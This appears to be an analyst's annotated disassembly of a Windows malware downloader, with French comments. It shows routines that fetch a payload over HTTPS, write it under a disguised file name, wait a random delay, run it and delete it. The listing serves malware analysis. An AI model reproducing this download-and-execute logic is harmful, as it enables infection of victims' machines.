downloadPayload proc near ; CODE XREF: start+280p .text:00401C0D .text:00401C0D String = word ptr -42Ch .text:00401C0D var_224 = word ptr -224h .text:00401C0D var_1C = dword ptr -1Ch .text:00401C0D var_18 = dword ptr -18h .text:00401C0D lNumberOfBytesRead= dword ptr -14h .text:00401C0D var_10 = dword ptr -10h .text:00401C0D hRequest = dword ptr -0Ch .text:00401C0D lNumberOfBytesAvailable= dword ptr -8 .text:00401C0D lpAddress = dword ptr -4 .text:00401C0D lpString = dword ptr 8 .text:00401C0D arg_4 = dword ptr 0Ch .text:00401C0D .text:00401C0D 55 push ebp .text:00401C0E 8B EC mov ebp, esp .text:00401C10 81 EC 2C 04 00 00 sub esp, 42Ch .text:00401C16 53 push ebx .text:00401C17 56 push esi .text:00401C18 57 push edi .text:00401C19 68 68 14 40 00 push offset asc_401468 ; "/" .text:00401C1E FF 75 08 push [ebp+lpString] .text:00401C21 FF 15 F4 1E 40 00 call lpfStrStriW .text:00401C27 50 push eax .text:00401C28 BF 60 14 40 00 mov edi, offset aS ; "%s" .text:00401C2D 57 push edi .text:00401C2E BE 04 01 00 00 mov esi, 104h .text:00401C33 8D 85 D4 FB FF FF lea eax, [ebp+String] .text:00401C39 56 push esi .text:00401C3A 50 push eax .text:00401C3B FF 15 FC 1E 40 00 call lpfwnsprintfW .text:00401C41 FF 75 08 push [ebp+lpString] .text:00401C44 8D 85 DC FD FF FF lea eax, [ebp+var_224] .text:00401C4A 57 push edi .text:00401C4B 56 push esi .text:00401C4C 50 push eax .text:00401C4D FF 15 FC 1E 40 00 call lpfwnsprintfW .text:00401C53 8B 35 24 10 40 00 mov esi, lstrlenW .text:00401C59 83 C4 20 add esp, 20h .text:00401C5C FF 75 08 push [ebp+lpString] ; lpString .text:00401C5F FF D6 call esi ; lstrlenW .text:00401C61 8B F8 mov edi, eax .text:00401C63 8D 85 D4 FB FF FF lea eax, [ebp+String] .text:00401C69 50 push eax ; lpString .text:00401C6A FF D6 call esi ; lstrlenW .text:00401C6C 33 F6 xor esi, esi .text:00401C6E 56 push esi .text:00401C6F 56 push esi .text:00401C70 56 push esi .text:00401C71 2B F8 sub edi, eax .text:00401C73 56 push esi .text:00401C74 33 C0 xor eax, eax .text:00401C76 68 70 14 40 00 push offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible; MSIE 7.0; Wind"... .text:00401C7B 66 89 84 7D DC FD+ mov [ebp+edi*2+var_224], ax .text:00401C83 C7 45 E8 00 33 00+ mov [ebp+var_18], 3300h .text:00401C8A FF 15 E0 1E 40 00 call lpfWinHttpOpen .text:00401C90 3B C6 cmp eax, esi .text:00401C92 0F 84 14 01 00 00 jz loc_401DAC .text:00401C98 56 push esi .text:00401C99 68 BB 01 00 00 push 1BBh .text:00401C9E 8D 8D DC FD FF FF lea ecx, [ebp+var_224] .text:00401CA4 51 push ecx .text:00401CA5 50 push eax .text:00401CA6 FF 15 0C 1F 40 00 call lpfWinHttpConnect .text:00401CAC 3B C6 cmp eax, esi .text:00401CAE 0F 84 F8 00 00 00 jz loc_401DAC .text:00401CB4 68 00 00 80 00 push 800000h .text:00401CB9 56 push esi .text:00401CBA 56 push esi .text:00401CBB 56 push esi .text:00401CBC 8D 8D D4 FB FF FF lea ecx, [ebp+String] .text:00401CC2 51 push ecx .text:00401CC3 68 D8 14 40 00 push offset aGet ; "GET" .text:00401CC8 50 push eax .text:00401CC9 FF 15 00 1F 40 00 call lpfWinHttpOpenRequest .text:00401CCF 6A 04 push 4 .text:00401CD1 5B pop ebx .text:00401CD2 8B F8 mov edi, eax .text:00401CD4 53 push ebx .text:00401CD5 8D 45 E8 lea eax, [ebp+var_18] .text:00401CD8 50 push eax .text:00401CD9 6A 1F push 1Fh .text:00401CDB 57 push edi .text:00401CDC 89 7D F4 mov [ebp+hRequest], edi .text:00401CDF FF 15 18 1F 40 00 call lpfWinHttpSetOption .text:00401CE5 53 push ebx .text:00401CE6 8D 45 F0 lea eax, [ebp+var_10] .text:00401CE9 50 push eax .text:00401CEA 6A 3F push 3Fh .text:00401CEC 57 push edi .text:00401CED C7 45 F0 0A 00 00+ mov [ebp+var_10], 0Ah .text:00401CF4 89 75 E4 mov [ebp+var_1C], esi .text:00401CF7 FF 15 18 1F 40 00 call lpfWinHttpSetOption .text:00401CFD 53 push ebx .text:00401CFE 8D 45 E4 lea eax, [ebp+var_1C] .text:00401D01 50 push eax .text:00401D02 6A 58 push 58h .text:00401D04 57 push edi .text:00401D05 FF 15 18 1F 40 00 call lpfWinHttpSetOption .text:00401D0B 3B FE cmp edi, esi .text:00401D0D 0F 84 99 00 00 00 jz loc_401DAC .text:00401D13 56 push esi .text:00401D14 56 push esi .text:00401D15 56 push esi .text:00401D16 56 push esi .text:00401D17 56 push esi .text:00401D18 56 push esi .text:00401D19 57 push edi .text:00401D1A FF 15 E4 1E 40 00 call WinHttpSendRequest .text:00401D20 85 C0 test eax, eax .text:00401D22 0F 84 84 00 00 00 jz loc_401DAC .text:00401D28 56 push esi .text:00401D29 57 push edi .text:00401D2A FF 15 08 1F 40 00 call WinHttpReceiveResponse .text:00401D30 85 C0 test eax, eax .text:00401D32 74 78 jz short loc_401DAC .text:00401D34 53 push ebx ; flProtect .text:00401D35 68 00 10 00 00 push 1000h ; flAllocationType .text:00401D3A BB 00 00 20 00 mov ebx, 200000h .text:00401D3F 53 push ebx ; dwSize .text:00401D40 .text:00401D40 lNumberOfButesAvailable: ; lpAddress .text:00401D40 56 push esi .text:00401D41 FF 15 34 10 40 00 call VirtualAlloc .text:00401D47 89 45 FC mov [ebp+lpAddress], eax .text:00401D4A 33 FF xor edi, edi .text:00401D4C .text:00401D4C loc_401D4C: ; CODE XREF: downloadPayload+17Bj .text:00401D4C 8D 45 F8 lea eax, [ebp+lNumberOfBytesAvailable] .text:00401D4F 50 push eax .text:00401D50 FF 75 F4 push [ebp+hRequest] .text:00401D53 89 75 F8 mov [ebp+lNumberOfBytesAvailable], esi ; On met le nombre d'octets a lire à 0 avant l'appel .text:00401D56 FF 15 14 1F 40 00 call lpfWinHttpQueryDataAvailable .text:00401D5C 8B 45 F8 mov eax, [ebp+lNumberOfBytesAvailable] .text:00401D5F 8D 0C 38 lea ecx, [eax+edi] .text:00401D62 3B CB cmp ecx, ebx .text:00401D64 77 32 ja short loc_401D98 .text:00401D66 3B C6 cmp eax, esi .text:00401D68 76 20 jbe short loc_401D8A .text:00401D6A 8D 4D EC lea ecx, [ebp+lNumberOfBytesRead] .text:00401D6D 51 push ecx .text:00401D6E 50 push eax ; EAX = dwNumberOfBytesToRead = lNumberOfBytesAvailable .text:00401D6F 8B 45 FC mov eax, [ebp+lpAddress] .text:00401D72 03 C7 add eax, edi .text:00401D74 50 push eax .text:00401D75 FF 75 F4 push [ebp+hRequest] .text:00401D78 FF 15 10 1F 40 00 call lpfWinHttpReadData ; On lit les données qui reviennent du GET .text:00401D7E 85 C0 test eax, eax .text:00401D80 74 03 jz short loc_401D85 .text:00401D82 03 7D EC add edi, [ebp+lNumberOfBytesRead] .text:00401D85 .text:00401D85 loc_401D85: ; CODE XREF: downloadPayload+173j .text:00401D85 39 75 F8 cmp [ebp+lNumberOfBytesAvailable], esi .text:00401D88 77 C2 ja short loc_401D4C .text:00401D8A .text:00401D8A loc_401D8A: ; CODE XREF: downloadPayload+15Bj .text:00401D8A 3B FE cmp edi, esi .text:00401D8C 76 1E jbe short loc_401DAC .text:00401D8E 8B 45 0C mov eax, [ebp+arg_4] .text:00401D91 89 38 mov [eax], edi .text:00401D93 8B 45 FC mov eax, [ebp+lpAddress] .text:00401D96 EB 16 jmp short loc_401DAE .text:00401D98 ; --------------------------------------------------------------------------- .text:00401D98 .text:00401D98 loc_401D98: ; CODE XREF: downloadPayload+157j .text:00401D98 39 75 FC cmp [ebp+lpAddress], esi .text:00401D9B 74 0F jz short loc_401DAC .text:00401D9D 68 00 80 00 00 push 8000h ; dwFreeType .text:00401DA2 56 push esi ; dwSize .text:00401DA3 FF 75 FC push [ebp+lpAddress] ; lpAddress .text:00401DA6 FF 15 0C 10 40 00 call VirtualFree .text:00401DAC .text:00401DAC loc_401DAC: ; CODE XREF: downloadPayload+85j .text:00401DAC ; downloadPayload+A1j ... .text:00401DAC 33 C0 xor eax, eax .text:00401DAE .text:00401DAE loc_401DAE: ; CODE XREF: downloadPayload+189j .text:00401DAE 5F pop edi .text:00401DAF 5E pop esi .text:00401DB0 5B pop ebx .text:00401DB1 C9 leave .text:00401DB2 C3 retn .text:00401DB2 downloadPayload endp .text:00401DB2 .text:00401DB3 .text:00401DB3 ; =============== S U B R O U T I N E ======================================= .text:00401DB3 .text:00401DB3 ; Attributes: bp-based frame .text:00401DB3 .text:00401DB3 ; int __cdecl executePayload(LPCVOID lpBuffer, DWORD nNumberOfBytesToWrite) .text:00401DB3 executePayload proc near ; CODE XREF: start+2CFp .text:00401DB3 .text:00401DB3 FileName = word ptr -60Ch .text:00401DB3 var_20C = byte ptr -20Ch .text:00401DB3 NumberOfBytesWritten= dword ptr -4 .text:00401DB3 lpBuffer = dword ptr 8 .text:00401DB3 nNumberOfBytesToWrite= dword ptr 0Ch .text:00401DB3 .text:00401DB3 55 push ebp .text:00401DB4 8B EC mov ebp, esp .text:00401DB6 81 EC 0C 06 00 00 sub esp, 60Ch .text:00401DBC 56 push esi .text:00401DBD 57 push edi .text:00401DBE 6A 01 push 1 .text:00401DC0 8D 85 F4 FD FF FF lea eax, [ebp+var_20C] .text:00401DC6 6A 06 push 6 .text:00401DC8 50 push eax .text:00401DC9 E8 ED F9 FF FF call BuildCredibleFileName .text:00401DCE 8D 85 F4 FD FF FF lea eax, [ebp+var_20C] .text:00401DD4 50 push eax .text:00401DD5 FF 35 D8 1E 40 00 push lpMemBlock2 .text:00401DDB 8D 85 F4 F9 FF FF lea eax, [ebp+FileName] .text:00401DE1 68 D0 11 40 00 push offset aSS ; "%s%s" .text:00401DE6 68 00 02 00 00 push 200h .text:00401DEB 50 push eax .text:00401DEC FF 15 FC 1E 40 00 call lpfwnsprintfW .text:00401DF2 83 C4 20 add esp, 20h .text:00401DF5 33 FF xor edi, edi .text:00401DF7 57 push edi ; hTemplateFile .text:00401DF8 68 80 00 00 00 push 80h ; dwFlagsAndAttributes .text:00401DFD 6A 02 push 2 ; dwCreationDisposition .text:00401DFF 57 push edi ; lpSecurityAttributes .text:00401E00 6A 01 push 1 ; dwShareMode .text:00401E02 68 00 00 00 40 push 40000000h ; dwDesiredAccess .text:00401E07 8D 85 F4 F9 FF FF lea eax, [ebp+FileName] .text:00401E0D 50 push eax ; lpFileName .text:00401E0E FF 15 20 10 40 00 call CreateFileW .text:00401E14 8B F0 mov esi, eax .text:00401E16 83 FE FF cmp esi, 0FFFFFFFFh .text:00401E19 74 61 jz short loc_401E7C .text:00401E1B 53 push ebx .text:00401E1C 57 push edi ; lpOverlapped .text:00401E1D 8D 45 FC lea eax, [ebp+NumberOfBytesWritten] .text:00401E20 50 push eax ; lpNumberOfBytesWritten .text:00401E21 FF 75 0C push [ebp+nNumberOfBytesToWrite] ; nNumberOfBytesToWrite .text:00401E24 FF 75 08 push [ebp+lpBuffer] ; lpBuffer .text:00401E27 56 push esi ; hFile .text:00401E28 FF 15 10 10 40 00 call WriteFile .text:00401E2E 56 push esi ; hObject .text:00401E2F 8B D8 mov ebx, eax .text:00401E31 FF 15 48 10 40 00 call CloseHandle .text:00401E37 68 60 EA 00 00 push 0EA60h .text:00401E3C B8 C0 D4 01 00 mov eax, 1D4C0h .text:00401E41 E8 5B FA FF FF call randomizeEAX .text:00401E46 8B 35 14 10 40 00 mov esi, Sleep .text:00401E4C 59 pop ecx .text:00401E4D 50 push eax ; dwMilliseconds .text:00401E4E FF D6 call esi ; Sleep .text:00401E50 3B DF cmp ebx, edi .text:00401E52 5B pop ebx .text:00401E53 74 27 jz short loc_401E7C .text:00401E55 6A 0A push 0Ah .text:00401E57 57 push edi .text:00401E58 57 push edi .text:00401E59 8D 85 F4 F9 FF FF lea eax, [ebp+FileName] .text:00401E5F 50 push eax .text:00401E60 57 push edi .text:00401E61 57 push edi .text:00401E62 FF 15 DC 1E 40 00 call lpfShellExecuteW ; ======> On va lancer la charge téléchargée ! .text:00401E68 68 10 27 00 00 push 2710h ; dwMilliseconds .text:00401E6D FF D6 call esi ; Sleep .text:00401E6F 8D 85 F4 F9 FF FF lea eax, [ebp+FileName] .text:00401E75 50 push eax ; lpFileName .text:00401E76 FF 15 4C 10 40 00 call DeleteFileW .text:00401E7C .text:00401E7C loc_401E7C: ; CODE XREF: executePayload+66j .text:00401E7C ; executePayload+A0j .text:00401E7C 5F pop edi .text:00401E7D 5E pop esi .text:00401E7E C9 leave .text:00401E7F C3 retn .text:00401E7F executePayload endp .text:00401E7F .text:00401E80 .text:00401E80 ; =============== S U B R O U T I N E ======================================= .text:00401E80 .text:00401E80 ; Attributes: bp-based frame .text:00401E80 .text:00401E80 computeChecksumPayload proc near ; CODE XREF: dechiffreEtVerifiePayload+2Ap .text:00401E80 .text:00401E80 var_4 = dword ptr -4 .text:00401E80 lpBuffer = dword ptr 8 .text:00401E80 lTailleBuffer = dword ptr 0Ch .text:00401E80 .text:00401E80 55 push ebp .text:00401E81 8B EC mov ebp, esp .text:00401E83 51 push ecx .text:00401E84 53 push ebx .text:00401E85 56 push esi .text:00401E86 57 push edi .text:00401E87 60 pusha .text:00401E88 8B 75 08 mov esi, [ebp+lpBuffer] .text:00401E8B 8B 7D 0C mov edi, [ebp+lTailleBuffer] .text:00401E8E FC cld .text:00401E8F 33 C9 xor ecx, ecx .text:00401E91 49 dec ecx .text:00401E92 8B D1 mov edx, ecx .text:00401E94 .text:00401E94 octetSuivant: ; CODE XREF: computeChecksumPayload+3Dj .text:00401E94 33 C0 xor eax, eax .text:00401E96 33 DB xor ebx, ebx .text:00401E98 AC lodsb ; AL = octet pointé par ESI .text:00401E99 32 C1 xor al, cl .text:00401E9B 8A CD mov cl, ch .text:00401E9D 8A EA mov ch, dl .text:00401E9F 8A D6 mov dl, dh .text:00401EA1 B6 08 mov dh, 8 .text:00401EA3 .text:00401EA3 loc_401EA3: ; CODE XREF: computeChecksumPayload+36j .text:00401EA3 66 D1 EB shr bx, 1 .text:00401EA6 66 D1 D8 rcr ax, 1 .text:00401EA9 73 09 jnb short loc_401EB4 .text:00401EAB 66 35 20 83 xor ax, 8320h .text:00401EAF 66 81 F3 B8 ED xor bx, 0EDB8h .text:00401EB4 .text:00401EB4 loc_401EB4: ; CODE XREF: computeChecksumPayload+29j .text:00401EB4 FE CE dec dh .text:00401EB6 75 EB jnz short loc_401EA3 .text:00401EB8 33 C8 xor ecx, eax .text:00401EBA 33 D3 xor edx, ebx .text:00401EBC 4F dec edi ; On décrémente le compteur d'octets à traiter .text:00401EBD 75 D5 jnz short octetSuivant .text:00401EBF F7 D2 not edx .text:00401EC1 F7 D1 not ecx .text:00401EC3 8B C2 mov eax, edx .text:00401EC5 C1 C0 10 rol eax, 10h .text:00401EC8 66 8B C1 mov ax, cx .text:00401ECB 89 45 FC mov [ebp+var_4], eax .text:00401ECE 61 popa .text:00401ECF 8B 45 FC mov eax, [ebp+var_4] .text:00401ED2 5F pop edi .text:00401ED3 5E pop esi .text:00401ED4 5B pop ebx .text:00401ED5 C9 leave .text:00401ED6 C3 retn .text:00401ED6 computeChecksumPayload endp .text:00401ED6 .text:00401ED6 ; --------------------------------------------------------------------------- .text:00401ED7 CC align 4 .text:00401ED8 ; LPWSTR lpMemBlock2 .text:00401ED8 00 00 00 00 lpMemBlock2 dd 0 ; DATA XREF: start+8Aw .text:00401ED8 ; start+124r ... .text:00401EDC 00 00 00 00 lpfShellExecuteW dd 0 ; DATA XREF: start+22Dr .text:00401EDC ; LoadUsefullLibraries+ADw ... .text:00401EE0 00 00 00 00 lpfWinHttpOpen dd 0 ; DATA XREF: LoadUsefullLibraries+125w .text:00401EE0 ; downloadPayload+7Dr .text:00401EE4 00 00 00 00 WinHttpSendRequest dd 0 ; DATA XREF: LoadUsefullLibraries+F1w .text:00401EE4 ; downloadPayload+10Dr .text:00401EE8 00 00 00 00 lpfWnsprintfA dd 0 ; DATA XREF: ErrorMsgBox+1Dr .text:00401EE8 ; LoadUsefullLibraries+83w .text:00401EEC 00 00 00 00 lpMemBlock3 dd 0 ; DATA XREF: start+98w .text:00401EEC ; start+225r ... .text:00401EF0 00 00 00 00 lpfSetupIterateCabinetW dd 0 ; DATA XREF: start+20Dr .text:00401EF0 ; LoadUsefullLibraries+A0w .text:00401EF4 00 00 00 00 lpfStrStriW dd 0 ; DATA XREF: LoadUsefullLibraries+BDw .text:00401EF4 ; downloadPayload+14r .text:00401EF8 00 00 00 00 lpMemBlock1 dd 0 ; DATA XREF: start+7Dw .text:00401EF8 ; CallBackFileCAB+76r ... .text:00401EFC 00 00 00 00 lpfwnsprintfW dd 0 ; DATA XREF: start+162r .text:00401EFC ; BuildCredibleFileName+1Er ... .text:00401F00 00 00 00 00 lpfWinHttpOpenRequest dd 0 ; DATA XREF: LoadUsefullLibraries+10Bw .text:00401F00 ; downloadPayload+BCr .text:00401F04 00 00 00 00 lpfSystemFunction036 dd 0 ; DATA XREF: randomizeEAX+Dr .text:00401F04 ; LoadUsefullLibraries+CAw .text:00401F08 00 00 00 00 WinHttpReceiveResponse dd 0 ; DATA XREF: LoadUsefullLibraries+E4w .text:00401F08 ; downloadPayload+11Dr .text:00401F0C 00 00 00 00 lpfWinHttpConnect dd 0 ; DATA XREF: LoadUsefullLibraries+118w .text:00401F0C ; downloadPayload+99r .text:00401F10 00 00 00 00 lpfWinHttpReadData dd 0 ; DATA XREF: LoadUsefullLibraries+12Fw .text:00401F10 ; downloadPayload+16Br .text:00401F14 00 00 00 00 lpfWinHttpQueryDataAvailable dd 0 ; DATA XREF: LoadUsefullLibraries+D7w .text:00401F14 ; downloadPayload+149r .text:00401F18 00 00 00 00 lpfWinHttpSetOption dd 0 ; DATA XREF: LoadUsefullLibraries+FEw .text:00401F18 ; downloadPayload+D2r ... .text:00401F1C 58 1F 00 00 00 00+ dd 1F58h, 2 dup(0) .text:00401F28 E8 20 00 00 00 10+ dd 20E8h, 1000h, 1FACh, 2 dup(0) .text:00401F3C 04 21 00 00 54 10+ dd 2104h, 1054h, 5 dup(0) .text:00401F58 B4 1F 00 00 C2 1F+ dd 1FB4h, 1FC2h, 1FD2h, 1FE2h, 1FF0h, 1FFCh, 2004h, 2016h .text:00401F58 00 00 D2 1F 00 00+ dd 202Ch, 203Ah, 2046h, 2056h, 2066h, 2078h, 2088h, 2098h .text:00401F58 E2 1F 00 00 F0 1F+ dd 20A8h, 20BCh, 20CCh, 20DAh, 0 .text:00401FAC F6 20 00 00 00 00+ dd 20F6h, 0 .text:00401FB4 04 01 45 78 69 74+ dd 78450104h, 72507469h, 7365636Fh, 1360073h, 646E6946h .text:00401FB4 50 72 6F 63 65 73+ dd 6F736552h, 65637275h, 2F60041h, 64616F4Ch, 6F736552h .text:00401FB4 73 00 36 01 46 69+ dd 65637275h, 4570000h, 74726956h, 466C6175h, 656572h .text:00401FB4 6E 64 52 65 73 6F+ dd 7257048Dh, 46657469h, 656C69h, 6C530421h, 706565h, 69530420h .text:00401FB4 75 72 63 65 41 00+ dd 666F657Ah, 6F736552h, 65637275h, 1F50000h .text:00402018 47 65 74 4D 6F 64+aGetmodulefilen db 'GetModuleFileNameW',0 .text:0040202B 00 align 4 .text:0040202C 7F 00 43 72 65 61+ dd 7243007Fh, 65746165h, 656C6946h, 4B60057h, 7274736Ch .text:0040202C 74 65 46 69 6C 65+ dd 576E656Ch, 25B0000h, 54746547h, 50706D65h, 57687461h .text:0040202C 57 00 B6 04 6C 73+ dd 1E60000h, 4C746547h, 45747361h, 726F7272h, 2200000h .text:0040202C 74 72 6C 65 6E 57+ dd 50746547h, 41636F72h, 65726464h, 7373h, 69560454h, 61757472h .text:0040202C 00 00 5B 02 47 65+ dd 6C6C416Ch, 636Fh, 6F4C02F1h, 694C6461h, 72617262h, 4179h .text:0040202C 74 54 65 6D 70 50+ dd 6F4C0307h, 65526B63h, 72756F73h, 6563h, 654701F6h, 646F4D74h .text:0040202C 61 74 68 57 00 00+ dd 48656C75h, 6C646E61h, 4165h, 7243008Bh, 65746165h, 6574754Dh .text:0040202C E6 01 47 65 74 4C+ dd 4178h, 6C430043h, 4865736Fh, 6C646E61h, 0C30065h, 656C6544h .text:0040202C 61 73 74 45 72 72+ dd 69466574h, 57656Ch, 4E52454Bh, 32334C45h, 6C6C642Eh .text:0040202C 6F 72 00 00 20 02+ dd 1F80000h, 7373654Dh, 42656761h, 41786Fh, 52455355h .text:0040202C 47 65 74 50 72 6F+ dd 642E3233h, 6C6Ch, 3Ch dup(0) .text:0040202C 63 41 64 64 72 65+_text ends .text:0040202C 73 73 00 00 54 04+ .text:0040202C 56 69 72 74 75 61+ .text:0040202C 6C 41 6C 6C 6F 63+ end start